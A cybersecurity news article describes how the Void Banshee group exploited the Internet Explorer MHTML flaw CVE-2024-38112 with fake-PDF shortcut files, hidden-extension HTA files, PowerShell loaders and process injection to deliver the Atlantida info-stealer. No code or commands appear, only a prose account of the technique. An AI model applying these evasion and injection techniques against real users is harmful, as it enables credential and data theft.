Windows Users Beware: Hackers Exploit Internet Explorer Zero-Day Vulnerability

The Void Banshee APT group exploited CVE-2024-38112, an MHTML RCE vulnerability, to execute malicious code through internet shortcuts and disabled Internet Explorer, delivering the Atlantida info-stealer. 

The attack chain, targeting North America, Europe, and Southeast Asia, leverages URL files and x-usc directives to bypass Internet Explorer restrictions, enabling the threat actor to access and run files directly within the disabled browser instance. 

Attack chain of the CVE-2024-38112 zero-day campaign

Despite being disabled, Internet Explorer remnants on modern Windows systems were exploited by attackers using CVE-2024-38112 in MSHTML to execute malicious HTA files through specially crafted .URL files. 

This technique leveraged the MHTML protocol handler and x-usc directive to bypass security measures and run code within the disabled IE process, mimicking previous attacks like CVE-2021-40444. Microsoft has addressed this threat by unregistering the MHTML handler from Internet Explorer in the July 2024 Patch Tuesday update. 

 Internet Explorer mode in Microsoft Edge

Void Banshee employed spearphishing links disguised as PDF files, primarily targeting professionals and students by leveraging online platforms hosting educational materials. 

The attack chain begins with a malicious URL shortcut file mimicking a PDF, which exploits CVE-2024-38112 to redirect the victim’s browser to a compromised website hosting a malicious HTA, abusing the MHTML protocol handler and x-usc! directive for execution. 

Malicious URL file disguised to look like a PDF of a book

An attacker leverages Internet Explorer to download a malicious HTA file disguised as a PDF. The HTML file, hosted on a compromised domain, controls the browser window size to obfuscate the download process. 

The HTA file’s extension is intentionally hidden to deceive the user, which exploits Internet Explorer’s default behavior of opening HTA files, unlike modern browsers

The HTA file extension does not appear on the screen

The “Books_A0UJKO.pdf<26 spaces>.hta” file, a disguised HTA shortcut, launches a VBScript, that decrypts XOR-encrypted content and executes it using PowerShell. 

The downloaded PowerShell script (“become.txt”) hides its console window and retrieves another malicious script from a compromised server, and then loads this downloaded script as a .NET assembly and executes its code, likely for further malicious actions.  

Contents of the “become.txt” PowerShell file

The .NET Trojan loader “LoadToBadXml.exe” decrypts a XOR-encrypted payload using a specific key and injects it into a legitimate process, “RegAsm.exe.”. 

It involves suspending “RegAsm.exe,”  allocating memory within it, writing the payload there, and finally creating a thread to execute it, while analysis by Trend Micro reveals “LoadToBadXml.exe” is a modified version of an open-source shellcode injector. 

The injected payload is most likely “Donut Loader,” another open-source tool that can execute various types of files in memory, including the final stage malware in this attack.  

LoadToBadXml injects the decrypted Donut loader into the RegAsm.exe process

Atlantida is an info-stealer that targets sensitive data from various applications, including messaging apps, gaming platforms, file transfer clients, cryptocurrency wallets, and web browsers. 

It captures screenshots, system information, and geolocation data, and steals files and credentials. The malware leverages open-source stealer code, collects data from multiple sources, and transmits a compressed archive of stolen data to a C&C server over TCP port 6666. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here